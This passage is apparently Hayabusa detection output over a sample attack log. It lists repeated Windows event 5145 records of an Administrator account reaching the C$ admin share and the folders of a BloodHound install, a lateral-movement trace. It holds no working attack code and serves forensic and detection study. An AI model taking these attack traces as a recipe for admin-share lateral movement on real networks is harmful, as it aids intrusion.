Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules : IP Address: 